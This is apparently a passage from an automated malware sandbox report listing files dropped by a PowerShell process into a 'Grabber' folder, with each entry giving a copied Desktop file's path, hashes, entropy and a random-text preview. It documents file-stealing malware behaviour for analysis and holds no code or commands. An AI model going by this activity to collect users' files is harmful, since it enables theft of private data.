                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\KLIZUSIQEN.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6998645060098685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                      MD5:1676F91570425F6566A5746BC8E8427E
                                                                                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\BJZFPPWAPT.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\EFOYFBOLXA.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\GRXZDKKVDB.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\NVWZAPQSQL.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6998645060098685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                      MD5:1676F91570425F6566A5746BC8E8427E
                                                                                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\PALRGUCVEH.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696508269038202
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\NYMMPCEIMA.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6957997909429325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
                                                                                      MD5:4F49714E789620AEDB7B9565DC949466
                                                                                      SHA1:5917AC09E3D5074BFF8E1289865CAFF6403D1E82
                                                                                      SHA-256:A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
                                                                                      SHA-512:61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696508269038202
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      